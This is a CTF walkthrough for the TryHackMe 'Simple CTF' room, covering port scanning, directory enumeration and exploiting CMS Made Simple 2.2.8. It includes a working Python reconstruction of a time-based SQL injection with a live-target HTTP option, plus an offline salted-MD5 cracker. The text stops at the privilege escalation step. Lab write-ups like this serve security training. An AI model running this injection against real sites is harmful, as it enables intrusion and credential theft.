【THM】Simple CTF-Practice
hihopkc. The TryHackMe room for this post: https://tryhackme.com/room/easyctf
Difficulty: Easy
Port scanning

```bash
nmap -p- -sC -sV -T4 10.10.246.59
```
From our results, we can see ports 21 (FTP), 80 (HTTP), and 2222 (SSH) are open.
First, let’s just browse to the IP and see what we get
We find it is the default Apache2 page, not much more to go off of here.
```bash
gobuster dir --url http://10.10.246.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
Using the medium wordlist we supplied, gobuster was able to find a page at “/simple”. Let’s browse to it now and see what we find.
Here we can see this is a default page for something called “CMS Made Simple” and if we look in the bottom corner we can see it is version 2.2.8.
Let’s see if there is anything online about this particular version by simply going to Google and searching “CMS Made Simple 2.2.8 exploit”.
https://www.exploit-db.com/exploits/46635
The exploit is a python script so I copied and pasted into a .py document on my attack box.
Alternatively:
When I ran it, I found the -u argument was missing.
This script performs a blind, time-based SQL injection against the CMS site's News module; its goal is to return the admin's credentials: the password salt, the username and the password hash, which it can then try to crack against a wordlist.

```bash
python 46635.py -u http://10.10.246.59/simple
```
I'm not sure why my brute-forced result differs from the writeup's.

```text
[+] Salt for password found: 1dac0d92e9fa6bb2
```
Bingo! We got a username and a cracked password returned from the exploit.
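To make the two steps above concrete (the time-based extraction the script performs, then the offline crack that turns the salt and hash into a password), here is an added Python example; it is not the exploit's own code and not part of the original post. It uses a constructed in-memory "server" in place of the target, so it runs offline; the salt is the value printed above, while the demo password, the resulting hash, and the table/column names (cms_siteprefs.sitepref_value, cms_users.password) are assumptions made for illustration. The payload shape and the News module endpoint are modeled on the exploit's approach.

```python
import hashlib
import re
import time
import urllib.request

SLEEP_SECONDS = 2
HEX = "0123456789abcdef"

# Constructed stand-ins for the database rows the real exploit reads. CMSMS keeps
# a site-wide salt and stores admin passwords as md5(salt + password). The salt is
# the one printed on this page; the password (and therefore the hash) is made up
# for the demo and is NOT the room's credential. Table/column names are assumptions.
SECRET_SALT = "1dac0d92e9fa6bb2"
SECRET_PASSWORD = "correct-horse"
SECRET_HASH = hashlib.md5((SECRET_SALT + SECRET_PASSWORD).encode()).hexdigest()
SECRETS = {("cms_siteprefs", "sitepref_value"): SECRET_SALT,
           ("cms_users", "password"): SECRET_HASH}


def build_payload(table, column, prefix, sleep=SLEEP_SECONDS):
    """Injected value for m1_idlist (modeled on 46635): the query sleeps only
    when a row of `table` has `column` starting with `prefix`."""
    return ("a,b,1,5))+and+(select+sleep(%d)+from+%s+where+%s+like+'%s%%25')+--+"
            % (sleep, table, column, prefix))


_PAYLOAD_RE = re.compile(r"from\+(\w+)\+where\+(\w+)\+like\+'([0-9a-f]*)%25'")


def constructed_server(payload):
    """Simulated vulnerable endpoint: returns the seconds the 'request' took.
    A real server would execute SLEEP(n) once per matching row."""
    m = _PAYLOAD_RE.search(payload)
    if not m:
        return 0.05
    table, column, prefix = m.groups()
    secret = SECRETS.get((table, column), "")
    return float(SLEEP_SECONDS) if secret and secret.startswith(prefix) else 0.05


def make_http_oracle(base_url):
    """Oracle against a live target (assumed reachable; not exercised here).
    The News module endpoint is the one the exploit targets."""
    endpoint = base_url.rstrip("/") + "/moduleinterface.php?mact=News,m1_,default,0&m1_idlist="

    def oracle(payload):
        start = time.monotonic()
        try:
            urllib.request.urlopen(endpoint + payload, timeout=SLEEP_SECONDS * 5).read()
        except Exception:
            pass  # a timeout or error still yields a usable elapsed time
        return time.monotonic() - start
    return oracle


def extract(oracle, table, column, alphabet=HEX, max_len=64, sleep=SLEEP_SECONDS):
    """Recover a hex value one character at a time: the only signal is whether
    the request took at least `sleep` seconds (prefix matched)."""
    found = ""
    while len(found) < max_len:
        for c in alphabet:
            if oracle(build_payload(table, column, found + c, sleep)) >= sleep:
                found += c
                break
        else:
            break  # no character extends the prefix: the value is complete
    return found


def crack(salt, target_hash, wordlist):
    """Offline step: CMSMS 2.2.x stores md5(salt + password), so each candidate
    is salted the same way and compared with the stolen hash."""
    for word in wordlist:
        if hashlib.md5((salt + word).encode()).hexdigest() == target_hash:
            return word
    return None


if __name__ == "__main__":
    salt = extract(constructed_server, "cms_siteprefs", "sitepref_value")
    pw_hash = extract(constructed_server, "cms_users", "password")
    print("[+] Salt for password found:", salt)
    print("[+] Password hash found:", pw_hash)
    print("[+] Password cracked:", crack(salt, pw_hash, ["password", "secret", "correct-horse"]))
```

Against a real target you would pass `make_http_oracle("http://10.10.246.59/simple")` instead of `constructed_server`, and a username needs a wider alphabet than hex. Note that the threshold comparison is why network jitter (or a slow VPN) can produce a wrong character: the exploit's result depending on timing is the usual reason two runs of the script disagree.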
SSH
Is there any other user in the home directory? What’s its name?
answer:
Privilege escalation
On to privilege escalation! First I like to start off with running “sudo -l” to see what my current user can run.

```bash
sudo -l
```